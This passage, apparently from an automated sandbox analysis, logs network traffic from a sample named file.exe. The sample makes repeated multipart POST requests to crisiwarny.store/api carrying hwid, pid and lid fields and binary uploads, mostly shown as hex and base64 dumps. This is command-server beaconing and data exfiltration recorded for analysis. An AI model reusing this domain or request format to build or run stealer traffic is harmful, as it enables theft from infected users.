                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1283&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=2203957&cwnd=244&unsent_bytes=0&cid=c44d1b39e0a098d9&ts=510&x=0"
                                                                                        2024-10-26 23:22:12 UTC362INData Raw: 31 64 38 32 0d 0a 46 6b 6c 69 2b 77 71 63 45 4b 67 77 70 43 36 61 36 56 4f 4b 54 6e 66 78 34 64 55 68 75 58 53 47 56 54 59 58 44 44 74 2b 31 62 4e 74 61 78 54 5a 4d 4b 67 38 69 6b 50 42 44 4b 43 64 49 66 38 72 57 39 4f 41 73 51 4f 44 45 75 63 35 52 58 49 67 47 51 69 34 6b 53 77 76 41 35 64 35 2b 54 79 4b 56 64 77 4d 6f 4c 49 6f 71 43 73 5a 30 39 76 33 52 4e 4d 57 35 7a 6c 55 64 6d 64 55 44 72 6e 51 66 69 55 46 6b 32 2f 2f 64 4d 6c 63 79 55 76 2f 6a 44 4c 67 49 42 36 63 69 62 67 44 6c 56 62 6a 4c 78 51 74 4c 6e 59 62 6f 64 4a 62 4b 42 47 51 4b 4f 45 38 30 78 4c 42 51 4c 6a 54 63 65 73 72 46 5a 32 48 73 55 72 52 48 4f 34 78 56 58 4e 6d 53 78 65 7a 32 33 34 72 42 70 4a 6c 39 6d 44 45 56 73 35 41 2b 59 59 79 71 47 4a 56 6c 4a 76 33 47 35 74 46 31 6a 52 46 5a
                                                                                        Data Ascii: 1d82Fkli+wqcEKgwpC6a6VOKTnfx4dUhuXSGVTYXDDt+1bNtaxTZMKg8ikPBDKCdIf8rW9OAsQODEuc5RXIgGQi4kSwvA5d5+TyKVdwMoLIoqCsZ09v3RNMW5zlUdmdUDrnQfiUFk2//dMlcyUv/jDLgIB6cibgDlVbjLxQtLnYbodJbKBGQKOE80xLBQLjTcesrFZ2HsUrRHO4xVXNmSxez234rBpJl9mDEVs5A+YYyqGJVlJv3G5tF1jRFZ
                                                                                        2024-10-26 23:22:12 UTC1369INData Raw: 2f 5a 6b 36 34 53 45 59 6b 34 36 39 54 4e 67 57 34 7a 31 65 65 6d 52 64 45 62 72 58 64 43 74 41 31 79 6a 35 61 6f 6f 4b 68 6d 2f 39 6d 7a 62 6b 4f 6c 65 70 77 36 67 4e 77 6c 62 6a 4f 78 51 74 4c 6c 45 5a 74 4e 4a 2f 4a 41 4f 52 59 2b 78 79 32 46 54 4c 53 65 71 4e 4e 4f 59 6d 46 6f 47 4a 75 55 58 59 48 2b 38 2b 55 58 4a 71 47 56 4c 33 31 6d 78 72 57 4e 6c 4a 38 33 6e 47 57 4e 46 4d 75 4a 52 2f 38 57 77 53 6e 38 50 76 41 39 38 58 34 44 5a 51 65 32 42 64 45 4c 48 66 65 53 51 47 6b 32 6a 35 65 4d 4a 61 78 30 48 7a 68 44 48 74 49 52 47 56 6a 37 5a 47 6d 31 69 6b 4d 45 77 31 4e 68 6b 79 73 4e 4a 6d 61 54 57 61 5a 76 42 31 33 42 4c 5a 41 75 48 4c 4e 75 52 73 54 64 4f 4e 73 6b 7a 4a 46 2f 59 79 57 6d 64 69 58 42 71 36 30 6e 6f 72 42 5a 35 6c 38 48 54 4e 55 63 35
                                                                                        Data Ascii: /Zk64SEYk469TNgW4z1eemRdEbrXdCtA1yj5aooKhm/9mzbkOlepw6gNwlbjOxQtLlEZtNJ/JAORY+xy2FTLSeqNNOYmFoGJuUXYH+8+UXJqGVL31mxrWNlJ83nGWNFMuJR/8WwSn8PvA98X4DZQe2BdELHfeSQGk2j5eMJax0HzhDHtIRGVj7ZGm1ikMEw1NhkysNJmaTWaZvB13BLZAuHLNuRsTdONskzJF/YyWmdiXBq60norBZ5l8HTNUc5
                                                                                        2024-10-26 23:22:12 UTC1369INData Raw: 75 52 73 54 64 4f 50 76 6b 50 51 48 4f 41 33 55 33 68 72 57 68 75 30 33 48 4d 68 44 70 35 73 38 6e 76 48 56 4d 5a 4c 2f 49 34 6a 37 53 55 5a 6e 38 50 35 41 39 77 4f 70 47 38 55 57 6d 6c 50 48 35 6a 53 5a 53 4a 41 68 69 62 6e 4d 73 31 65 68 68 53 34 6a 44 54 67 4a 78 4f 62 67 36 56 47 31 52 33 6c 50 56 4a 30 59 31 55 61 74 39 42 30 4c 51 79 5a 62 2f 6c 67 32 46 66 41 58 76 4c 4c 66 36 67 72 44 64 50 62 39 33 58 4c 41 66 55 68 46 6b 42 74 56 78 4b 77 78 7a 51 30 54 6f 41 6f 2b 58 36 4b 43 6f 5a 48 2b 49 63 32 34 43 6f 52 6d 34 79 34 53 73 6b 58 36 44 6c 47 63 6d 35 51 45 72 6a 64 66 53 59 48 6c 47 50 30 66 38 35 56 78 77 79 32 79 7a 62 77 62 45 33 54 74 61 64 4f 31 7a 6a 76 4f 31 30 31 63 52 63 46 39 39 5a 34 61 31 6a 5a 62 50 4a 36 77 46 33 50 52 76 4b 45
                                                                                        Data Ascii: uRsTdOPvkPQHOA3U3hrWhu03HMhDp5s8nvHVMZL/I4j7SUZn8P5A9wOpG8UWmlPH5jSZSJAhibnMs1ehhS4jDTgJxObg6VG1R3lPVJ0Y1Uat9B0LQyZb/lg2FfAXvLLf6grDdPb93XLAfUhFkBtVxKwxzQ0ToAo+X6KCoZH+Ic24CoRm4y4SskX6DlGcm5QErjdfSYHlGP0f85Vxwy2yzbwbE3TtadO1zjvO101cRcF99Z4a1jZbPJ6wF3PRvKE
                                                                                        2024-10-26 23:22:12 UTC1369INData Raw: 72 54 7a 66 64 45 77 31 61 38 64 33 74 53 57 78 73 39 6a 5a 46 72 5a 52 6e 5a 62 2f 49 79 6b 68 4c 4b 54 2f 53 44 50 75 34 6c 47 5a 6d 4b 76 45 2f 51 45 75 67 2b 55 58 4e 76 58 42 6d 32 31 58 67 68 42 70 70 72 38 58 33 46 57 6f 59 43 75 49 77 70 71 48 52 56 74 70 53 38 54 64 31 57 2b 33 6c 4e 4e 57 6c 56 58 4f 2b 52 65 43 49 47 6e 32 33 79 63 38 78 61 77 30 54 38 69 6a 66 75 4c 78 71 58 68 72 5a 4d 33 78 72 71 50 56 56 30 59 6c 49 54 76 4e 51 30 5a 55 43 65 63 4c 34 71 69 6d 50 46 57 75 2b 62 50 61 67 7a 57 34 72 44 73 45 2b 62 54 71 51 32 52 6e 39 6b 56 78 6d 34 31 48 63 6b 42 35 52 75 38 6e 6a 44 57 73 42 44 38 5a 6b 79 35 43 49 53 6e 59 2b 35 54 74 45 56 36 58 63 61 4e 57 6c 42 58 4f 2b 52 57 43 77 4e 74 32 50 79 64 59 70 4e 69 46 57 34 6a 44 32 6f 64
                                                                                        Data Ascii: rTzfdEw1a8d3tSWxs9jZFrZRnZb/IykhLKT/SDPu4lGZmKvE/QEug+UXNvXBm21XghBppr8X3FWoYCuIwpqHRVtpS8Td1W+3lNNWlVXO+ReCIGn23yc8xaw0T8ijfuLxqXhrZM3xrqPVV0YlITvNQ0ZUCecL4qimPFWu+bPagzW4rDsE+bTqQ2Rn9kVxm41HckB5Ru8njDWsBD8Zky5CISnY+5TtEV6XcaNWlBXO+RWCwNt2PydYpNiFW4jD2od
                                                                                        2024-10-26 23:22:12 UTC1369INData Raw: 42 52 4d 73 47 35 33 56 6c 59 32 31 50 46 37 72 64 4e 44 52 4f 67 43 6a 35 66 6f 6f 4b 68 6b 72 33 67 6a 4c 6e 4c 52 79 66 6a 72 4a 4b 33 68 66 69 4d 31 35 2f 62 6c 38 61 74 74 52 2b 4b 41 47 54 59 66 6c 36 7a 56 48 55 44 4c 62 4c 4e 76 42 73 54 64 4f 71 73 46 48 56 42 71 51 6f 47 6d 77 75 58 68 44 33 69 54 51 76 43 70 5a 73 2b 58 37 4d 56 38 42 42 2b 59 51 77 36 43 4d 52 6d 49 71 78 51 74 59 54 36 54 4e 47 66 32 56 57 45 4c 37 64 65 57 74 4f 32 57 2f 6d 4d 70 49 53 39 30 48 32 68 54 62 2b 62 41 72 64 6d 76 64 45 31 31 61 38 64 31 56 35 59 56 6f 54 74 4e 4a 31 49 52 4b 4c 5a 50 64 36 7a 31 37 4e 51 76 36 5a 4e 2b 63 6c 46 70 43 4b 73 45 76 58 48 4f 63 77 46 44 73 75 58 67 54 33 69 54 51 49 46 34 6c 6c 76 6d 32 45 53 34 5a 4c 39 4d 74 70 71 43 51 59 6d 34
                                                                                        Data Ascii: BRMsG53VlY21PF7rdNDROgCj5fooKhkr3gjLnLRyfjrJK3hfiM15/bl8attR+KAGTYfl6zVHUDLbLNvBsTdOqsFHVBqQoGmwuXhD3iTQvCpZs+X7MV8BB+YQw6CMRmIqxQtYT6TNGf2VWEL7deWtO2W/mMpIS90H2hTb+bArdmvdE11a8d1V5YVoTtNJ1IRKLZPd6z17NQv6ZN+clFpCKsEvXHOcwFDsuXgT3iTQIF4llvm2ES4ZL9MtpqCQYm4
                                                                                        2024-10-26 23:22:12 UTC1369INData Raw: 48 2b 41 2f 56 33 56 71 58 52 75 79 30 6e 67 67 42 35 70 6e 2b 6e 76 45 57 38 6b 4d 74 73 73 32 38 47 78 4e 30 36 4b 73 51 4e 63 62 70 43 67 61 62 43 35 65 45 50 65 4a 4e 43 63 4f 6e 47 6a 30 64 4d 35 58 77 45 62 39 69 7a 72 72 49 78 47 56 68 37 68 44 30 42 2f 6c 4d 56 46 2f 5a 56 38 52 74 4e 64 79 61 30 37 5a 62 2b 59 79 6b 68 4c 6d 56 2f 57 48 4e 71 67 7a 57 34 72 44 73 45 2b 62 54 71 51 38 57 48 46 70 57 52 47 30 32 58 45 76 43 70 78 6f 39 6d 44 43 55 73 46 65 36 6f 73 34 37 53 41 57 6b 34 65 78 53 74 30 56 34 48 63 61 4e 57 6c 42 58 4f 2b 52 57 53 63 48 73 47 2f 6c 4d 74 55 63 33 77 7a 2f 68 33 47 77 62 42 53 59 69 62 68 4f 32 42 44 6e 50 46 46 2f 62 31 34 55 75 73 4e 33 4a 41 2b 64 61 50 46 30 7a 46 50 4a 53 76 2b 43 4d 4f 41 72 56 64 33 44 73 46 75
                                                                                        Data Ascii: H+A/V3VqXRuy0nggB5pn+nvEW8kMtss28GxN06KsQNcbpCgabC5eEPeJNCcOnGj0dM5XwEb9izrrIxGVh7hD0B/lMVF/ZV8RtNdya07Zb+YykhLmV/WHNqgzW4rDsE+bTqQ8WHFpWRG02XEvCpxo9mDCUsFe6os47SAWk4exSt0V4HcaNWlBXO+RWScHsG/lMtUc3wz/h3GwbBSYibhO2BDnPFF/b14UusN3JA+daPF0zFPJSv+CMOArVd3DsFu
                                                                                        2024-10-26 23:22:12 UTC355INData Raw: 31 4e 69 59 52 6c 53 39 39 34 30 63 7a 6e 5a 59 66 6c 70 32 30 54 4c 58 50 2f 4c 44 71 5a 73 44 64 50 62 39 33 62 59 47 4f 6f 77 51 6d 51 6a 66 67 71 39 31 6d 51 73 46 35 59 6f 73 44 4c 4d 45 70 34 66 74 73 73 31 2b 57 78 4e 77 39 48 73 46 6f 68 42 74 47 56 4c 4f 33 63 5a 43 76 65 4a 4a 6d 56 41 69 79 69 6d 4d 6f 31 52 31 46 37 2b 69 43 66 72 61 79 75 74 70 4b 31 4f 33 51 48 31 43 57 70 79 64 46 51 61 6f 4d 41 34 50 67 4f 58 5a 76 6c 6b 69 68 79 47 51 37 6a 54 43 4b 68 6b 56 61 7a 4e 39 31 75 62 54 71 51 43 56 33 74 67 58 67 71 6d 6e 46 4d 78 44 5a 39 2f 37 7a 4b 45 45 73 41 4d 6f 4e 74 2f 71 43 67 45 30 39 76 6e 45 59 42 44 74 32 41 45 4a 33 45 58 42 66 66 48 4e 48 4e 53 31 79 6a 73 4d 70 49 53 67 55 2f 71 6d 54 66 72 4f 68 62 55 76 59 6c 74 33 42 44 68
                                                                                        Data Ascii: 1NiYRlS9940cznZYflp20TLXP/LDqZsDdPb93bYGOowQmQjfgq91mQsF5YosDLMEp4ftss1+WxNw9HsFohBtGVLO3cZCveJJmVAiyimMo1R1F7+iCfrayutpK1O3QH1CWpydFQaoMA4PgOXZvlkihyGQ7jTCKhkVazN91ubTqQCV3tgXgqmnFMxDZ9/7zKEEsAMoNt/qCgE09vnEYBDt2AEJ3EXBffHNHNS1yjsMpISgU/qmTfrOhbUvYlt3BDh
                                                                                        2024-10-26 23:22:12 UTC1369INData Raw: 31 30 33 65 0d 0a 73 53 32 54 43 2b 4e 63 6c 41 31 45 72 37 6e 54 4b 76 45 69 75 51 6c 62 70 4d 30 42 66 61 43 58 70 34 62 31 6f 53 39 65 42 69 4a 68 43 61 62 66 6c 4d 39 46 7a 42 57 50 2b 46 4e 2b 68 73 57 39 4f 4d 39 78 76 69 56 71 78 33 61 7a 73 75 51 56 7a 76 6b 55 45 6f 44 70 64 76 36 47 4f 48 63 64 42 42 39 34 41 77 71 47 4a 56 6c 63 50 76 45 35 56 57 34 43 59 55 4c 54 34 4c 52 2b 4b 43 49 33 74 53 68 69 62 6e 4d 74 77 53 6e 68 36 32 79 79 4f 6f 64 46 58 55 6a 62 70 43 32 42 6a 6e 4a 55 5a 7a 62 55 38 66 38 4f 39 4b 43 67 32 53 5a 50 4e 39 77 57 7a 34 62 66 57 41 50 65 55 6a 48 71 32 39 6f 6b 44 56 47 4f 4d 68 52 54 55 67 47 52 50 33 69 55 31 72 53 4e 6c 58 73 44 4c 53 45 70 34 4d 7a 59 67 2f 35 69 73 44 67 73 36 57 54 74 41 61 36 54 68 66 4e 53 41
                                                                                        Data Ascii: 103esS2TC+NclA1Er7nTKvEiuQlbpM0BfaCXp4b1oS9eBiJhCabflM9FzBWP+FN+hsW9OM9xviVqx3azsuQVzvkUEoDpdv6GOHcdBB94AwqGJVlcPvE5VW4CYULT4LR+KCI3tShibnMtwSnh62yyOodFXUjbpC2BjnJUZzbU8f8O9KCg2SZPN9wWz4bfWAPeUjHq29okDVGOMhRTUgGRP3iU1rSNlXsDLSEp4MzYg/5isDgs6WTtAa6ThfNSA
                                                                                        2024-10-26 23:22:12 UTC1369INData Raw: 6d 49 6f 52 36 64 57 32 32 58 4a 51 73 42 50 78 72 55 61 35 43 6f 53 69 59 53 78 5a 66 74 57 71 6e 64 62 4e 54 5a 67 58 50 2b 52 53 32 56 41 67 53 69 6d 4d 76 39 52 79 45 4c 2f 6e 53 43 6c 43 51 4b 51 6b 37 46 41 6d 31 69 6b 4d 52 51 74 50 68 64 63 73 38 41 30 63 31 44 4c 4d 36 73 68 6e 51 4b 55 55 37 61 53 63 66 35 73 54 63 48 4e 39 31 47 62 54 71 52 77 56 32 64 38 58 78 2b 68 30 6a 4d 56 50 72 39 72 37 33 6a 72 58 39 5a 4c 78 72 55 6b 36 79 49 62 6c 4a 57 6d 41 35 56 57 36 33 63 4d 54 43 34 52 55 4c 48 53 59 6d 73 2f 31 79 6a 6d 4d 70 49 53 38 30 2f 32 68 54 62 2b 50 56 69 31 67 4b 5a 4a 2b 68 76 30 4d 42 51 37 4c 6c 39 63 37 34 49 36 61 77 53 49 4b 4b 59 69 6d 41 6d 54 48 36 2f 62 59 2f 64 69 44 4e 4f 56 39 78 75 4a 57 4b 51 6c 46 43 30 75 48 68 2b 6c
                                                                                        Data Ascii: mIoR6dW22XJQsBPxrUa5CoSiYSxZftWqndbNTZgXP+RS2VAgSimMv9RyEL/nSClCQKQk7FAm1ikMRQtPhdcs8A0c1DLM6shnQKUU7aScf5sTcHN91GbTqRwV2d8Xx+h0jMVPr9r73jrX9ZLxrUk6yIblJWmA5VW63cMTC4RULHSYms/1yjmMpIS80/2hTb+PVi1gKZJ+hv0MBQ7Ll9c74I6awSIKKYimAmTH6/bY/diDNOV9xuJWKQlFC0uHh+l


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.749702172.67.170.644436636C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-26 23:22:13 UTC282OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 12849
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-26 23:22:13 UTC12849OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 32 46 43 44 36 43 38 30 34 39 36 41 43 42 36 35 45 34 36 36 46 41 32 43 33 41 44 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"BC02FCD6C80496ACB65E466FA2C3ADFE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                        2024-10-26 23:22:14 UTC1012INHTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=qiu07s6nfqfiu7t4420dhd20aq; expires=Wed, 19 Feb 2025 17:08:53 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FeVZCXZc%2FbaTn%2FWOr2HtjChA4TPbnHi1KMqxtixWTs9ZDCKk1KkOZJNXL3giVS34ClPnZmo5a%2BwCr4PQZeqMhUNCFhCjZ8jZ75BHuT54MDjz7dLrzyXH8qdM4rCFm2YVYe2Y"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e2fecc9070b7a-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1334&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13789&delivery_rate=2113868&cwnd=237&unsent_bytes=0&cid=d5e6f1cdb847f1b3&ts=796&x=0"
                                                                                        2024-10-26 23:22:14 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.68
                                                                                        2024-10-26 23:22:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.749703172.67.170.644436636C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-26 23:22:15 UTC282OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 15081
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-26 23:22:15 UTC15081OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 32 46 43 44 36 43 38 30 34 39 36 41 43 42 36 35 45 34 36 36 46 41 32 43 33 41 44 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"BC02FCD6C80496ACB65E466FA2C3ADFE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                        2024-10-26 23:22:15 UTC1013INHTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:15 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=gsgd51fsjtku2q3oa9a18lc5oi; expires=Wed, 19 Feb 2025 17:08:54 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5TxnrrO4BbQPBjE7thIsXpJQvQRA8%2Bd40a5bCNbzjvz0JdK2tMtSDJw6xrQZqnf4oM61vsixwtiz05kTSkyhTFxoOxb3jYXN6aKOeLMZf%2FKo%2BamnX8zVRKg2pM7ASy1Zy%2BIb"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e2ff66ea245e4-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1199&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16021&delivery_rate=2419381&cwnd=250&unsent_bytes=0&cid=9cb9e6a019645d86&ts=597&x=0"
                                                                                        2024-10-26 23:22:15 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.68
                                                                                        2024-10-26 23:22:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.749705172.67.170.644436636C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-26 23:22:16 UTC282OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 20406
                                                                                        Host: crisiwarny.store
                                                                                        2024-10-26 23:22:16 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 32 46 43 44 36 43 38 30 34 39 36 41 43 42 36 35 45 34 36 36 46 41 32 43 33 41 44 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"BC02FCD6C80496ACB65E466FA2C3ADFE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                        2024-10-26 23:22:16 UTC5075OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d
                                                                                        Data Ascii: (X6K~`iO\_,mi`m?ls}Qm
                                                                                        2024-10-26 23:22:17 UTC1017INHTTP/1.1 200 OK
                                                                                        Date: Sat, 26 Oct 2024 23:22:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=sb3eo9n3sta25ka0ehm46bh8v2; expires=Wed, 19 Feb 2025 17:08:56 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=14LIZ%2Bt4QX9y3nWK7TvbwDL%2BOrtIBY4BmS6rFiQFQd2E8VuQ0XzA0Wv7DOGhYdD5O%2F7M2yHN%2BUDBXUMidNWOaag%2FgDDJhXToIxM9dkku51gOFUq2Uq36ky0ZxXLeqBlQP%2F3U"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d8e2fff98862e6b-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2029&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21368&delivery_rate=1384983&cwnd=251&unsent_bytes=0&cid=20762f722f3f956c&ts=703&x=0"
                                                                                        2024-10-26 23:22:17 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 0d 0a
                                                                                        Data Ascii: 11ok 173.254.250.68
                                                                                        2024-10-26 23:22:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.749711172.67.170.644436636C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-26 23:22:18 UTC281OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1242
                                                                                        Host: crisiwarny.store
